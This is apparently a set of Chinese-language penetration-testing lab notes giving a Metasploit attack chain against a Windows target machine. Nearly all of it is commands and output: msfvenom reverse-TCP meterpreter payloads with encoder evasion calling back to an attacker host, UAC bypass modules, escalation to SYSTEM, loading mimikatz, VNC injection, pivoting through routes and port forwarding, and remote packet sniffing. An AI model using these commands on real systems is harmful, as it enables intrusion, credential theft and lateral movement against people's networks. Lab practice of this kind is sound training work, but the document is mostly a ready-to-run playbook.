1. 获取sesson
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp Lhost=192.168.48.129 LPORT=9999 -b “\00” -e x86/shikata_ga_nai -f exe -o ss.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 9999
set lhost 0.0.0.0
目标靶机运行执行脚本
getsystem失败–因为UAC对我们的命令做了限制
2. 使用UACpypass,提升session权限
use exploit/windows/local/ask
set session 1
set filename 360up.exe
3. 使用UACpypass第二种方法,客户端无感知
use exploit/windows/local/bypassuac
4. 制作一个64位的payload让目标靶机执行
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp Lhost=192.168.48.129 LPORT=9999 -f exe -o sss.exe
meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz
7. 自动发现可利用的漏洞
use post/multi/recon/local_exploit_suggester
8. 使用vnc payload 进行图形化界面查看或者控制
use exploit/windows/local/bypassuac_injection
set payload windows/x64/vncinject/reverse_tcp
9. 试利用现有的漏洞对内网进行攻击
1).建立session路由,让我们能够访问对端网络
route add 192.168.100.0 255.255.255.0 5
2).做端口映射(netstart -an|more)
session 5
portfwd add -l 445 -r 127.0.0.1 -p 445
-l 在kali上监听的端口
-r 目标IP,可以是对端本机(127.0.0.1),或者是对端可以访问到的任何IP
-p 目标端口
msf --> kali(445)—> 靶机(跳板) ----> 目标ip:端口
meterpreter>portfwd
10. 远程抓包
远程截图
抓包(meterpreter)
load sniffer
?
sniffer_interfaces
sniffer_start 2
sniffer_dump 2 1.cap
use auxiliary/sniffer/psnuffle
在内存中缓存区块循环存储抓包(50000包),不写硬盘
智能过滤meterpreter流量,传输全程使用SSL/TLS加密
解码
set PCAPFILE 1. cap